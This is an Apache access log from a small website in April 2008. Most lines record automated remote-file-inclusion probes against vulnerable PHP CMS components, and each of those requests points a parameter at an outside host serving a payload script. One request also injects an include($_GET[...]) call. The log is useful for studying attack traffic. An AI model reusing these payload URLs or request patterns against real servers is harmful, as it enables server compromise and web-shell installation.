59.125.5.1 - - [10/Apr/2008:10:43:02 -0700] "GET //modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:43:03 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:43:09 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.227.162 - - [10/Apr/2008:10:43:17 -0700] "GET /main.php?site=http://www.kineufro.cl/_vti_log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:43:36 -0700] "GET //modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:43:54 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:44:12 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:44:12 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:44:13 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:45:08 -0700] "GET //modules/xoopsgallery/index.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.149.140.190 - - [10/Apr/2008:10:45:21 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:45:46 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:10:45:48 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.93 - - [10/Apr/2008:10:45:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.121 - - [10/Apr/2008:10:45:54 -0700] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:46:03 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:46:07 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:46:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:46:09 -0700] "GET /logs//modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.192.249 - - [10/Apr/2008:10:46:45 -0700] "GET //coppermine/themes/default/theme.php?THEME_DIR=http://www.twinzinenonzin.nl/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:10:46:53 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:10:46:53 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:47:07 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:47:07 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:47:07 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:47:18 -0700] "GET //modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:10:47:19 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:47:29 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../ngalbaa.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.140.190 - - [10/Apr/2008:10:47:30 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.140.190 - - [10/Apr/2008:10:47:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.140.190 - - [10/Apr/2008:10:47:31 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:47:33 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:48:08 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:48:08 -0700] "GET //main.php?sayfa=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:48:08 -0700] "GET /logs//main.php?sayfa=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.176.255.158 - - [10/Apr/2008:10:48:12 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:10:48:22 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:10:48:22 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:48:26 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:48:30 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.silak.eu//components/com_rwcard/alba.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:48:50 -0700] "GET //modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:49:38 -0700] "GET //modules/xoopsgallery/classes/gallery/UserDB.php?Gallery_UserDB=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.149.140.190 - - [10/Apr/2008:10:49:40 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:50:12 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:50:13 -0700] "GET //codebb/lang_select?phpbb_root_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.69.205.114 - - [10/Apr/2008:10:50:34 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.69.205.114 - - [10/Apr/2008:10:50:35 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:50:50 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:50:50 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:50:50 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:51:02 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:51:02 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:51:03 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.42 - - [10/Apr/2008:10:51:04 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
87.101.4.42 - - [10/Apr/2008:10:51:04 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:51:14 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:51:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:51:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:52:29 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:52:30 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:52:30 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.129.70 - - [10/Apr/2008:10:53:28 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [10/Apr/2008:10:53:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [10/Apr/2008:10:53:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:53:52 -0700] "GET /logs/access_080213.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:53:54 -0700] "GET //?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:53:56 -0700] "GET /logs//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 42556 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:54:00 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.195.11.193 - - [10/Apr/2008:10:54:26 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [10/Apr/2008:10:54:27 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [10/Apr/2008:10:54:27 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.132.91 - - [10/Apr/2008:10:54:55 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.114.132.91 - - [10/Apr/2008:10:54:55 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:10:55:10 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:10:55:10 -0700] "GET /logs/access_080127.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:10:55:10 -0700] "GET //modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:10:55:11 -0700] "GET /logs//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:10:55:24 -0700] "GET //citywriter/head.php?path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.3.229.166 - - [10/Apr/2008:10:55:29 -0700] "GET /logs//citywriter/head.php?path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.143 - - [10/Apr/2008:10:56:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gundam-gundam.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.185.237.143 - - [10/Apr/2008:10:56:12 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gundam-gundam.net/id?? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:10:56:14 -0700] "GET //modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:56:32 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:56:32 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:56:33 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:57:12 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:57:13 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:10:57:17 -0700] "GET /logs/access_080201.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.205.114 - - [10/Apr/2008:10:57:39 -0700] "GET /logs//login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.69.205.114 - - [10/Apr/2008:10:57:39 -0700] "GET //login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:10:57:54 -0700] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:10:57:55 -0700] "GET /logs/config.inc.php?path_escape=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.192.249 - - [10/Apr/2008:10:57:58 -0700] "GET //vwar/convert/mvcw_conver.php?step=http://www.twinzinenonzin.nl/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:10:58:21 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:10:58:22 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:10:58:22 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:58:29 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:58:29 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:58:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:58:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [10/Apr/2008:10:58:38 -0700] "GET //Neos_Chronos/header.php?base_folder=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.175.248.213 - - [10/Apr/2008:10:58:39 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:10:58:50 -0700] "GET /logs/access_080309.log/index.php?option=com_joomap=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:10:58:50 -0700] "GET /logs/index.php?option=com_joomap=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:10:58:50 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:10:58:51 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:58:54 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:58:55 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:10:58:55 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.142.80.108 - - [10/Apr/2008:10:59:08 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.29.7.70 - - [10/Apr/2008:10:59:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "holmes/3.12.2 (http://morfeo.centrum.cz/bot)" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:59:45 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:59:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:59:46 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:59:52 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:59:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:59:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:59:58 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
